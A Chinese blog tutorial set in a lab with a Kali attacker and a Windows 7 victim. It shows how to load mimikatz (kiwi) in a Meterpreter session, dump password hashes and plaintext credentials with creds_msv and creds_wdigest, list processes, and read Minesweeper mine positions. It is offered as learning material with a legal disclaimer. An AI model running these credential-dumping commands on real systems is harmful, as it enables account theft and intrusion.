利用mimikatz插件获取内网相关信息

简介: 利用mimikatz插件获取内网相关信息

环境:小攻:Kali 2020,ip:192.168.1.133


         小受:win7 x86,ip:192.168.1.137



一、生成木马及监听主机参考上篇文章:


二、利用mimikatz获取内网相关信息


1、加载mimikatz


meterpreter > load kiwi


0a2653c851af460fa595bd959398a8f1.png


2、查看帮助信息


meterpreter > help kiwi


0eacb84100b54626af849e6b562bf92a.png


3、获取用户的hash值


meterpreter > creds_msv


2d65d23f6d4748949b924e4057485923.png


4、获取明文密码


meterpreter > creds_wdigest


2e9b90b2ca334476abebe75bafe6eeaa.png


5、查看当前主机运行的进程


meterpreter > kiwi_cmd process::list


4cebaac233b3433da32a72337a77fc60.png6de278e6d6694ce5bb08e7e842b7e74b.png


三、获取扫雷小游戏的地雷位置


1、在小受上运行扫雷


7a399525ddec4b77923c464820b33738 (1).png


2、在小攻上运行下面命令即可获取地雷位置


meterpreter > kiwi_cmd minesweeper::infos


7a399525ddec4b77923c464820b33738.png8ec4f2997fb246878c34ecd6d122b7c6.png


禁止非法,后果自负


目录
相关文章
|
9月前
|
存储 网络协议 Ubuntu
如何在Ubuntu安装配置SVN服务端并实现无公网ip访问内网资料库
如何在Ubuntu安装配置SVN服务端并实现无公网ip访问内网资料库
260 0
|
关系型数据库 MySQL 数据库
MySQL数据库远程访问权限如何打开(两种方法)
MySQL数据库远程访问权限如何打开(两种方法) 下载GPL版本安装 MySQL Community Edition(GPL) Community (GPL) Downloads  在我们使用mysql数据库时,有时我们的程序与数据库不在同一机器上,这时我们需要远程访问数据库。
1747 0
|
8月前
|
安全 数据可视化 JavaScript
【内网安全】域信息收集&应用网络凭据&CS插件&Adfind&BloodHound
【内网安全】域信息收集&应用网络凭据&CS插件&Adfind&BloodHound
134 1
|
9月前
|
安全 数据安全/隐私保护
利用mimikatz插件获取内网相关信息
利用mimikatz插件获取内网相关信息
61 1
|
9月前
利用arpspoof工具获取内网浏览器信息
利用arpspoof工具获取内网浏览器信息
53 1
|
SQL 监控 数据库连接
实现基于内网管理监控软件的用户身份验证系统的PHP代码详解
随着信息技术的不断发展,内网管理监控软件的需求也日益增长。为了确保系统的安全性,用户身份验证成为了至关重要的一环。本文将详细介绍如何通过PHP代码实现基于内网管理监控软件的用户身份验证系统,并提供一些代码示例。
269 0
|
Linux Python
不可出外网的主机如何快速、方便、优雅的安装Python库?
不可出外网的主机如何快速、方便、优雅的安装Python库?
523 0
不可出外网的主机如何快速、方便、优雅的安装Python库?
|
安全 Shell 网络安全
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
718 0
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
|
网络协议
命令行工具 - 多支持多运营商的 `DNS 命令行` 客户端。
命令行工具 - 多支持多运营商的 `DNS 命令行` 客户端。
148 0
|
Web App开发 XML 网络协议

热门文章

最新文章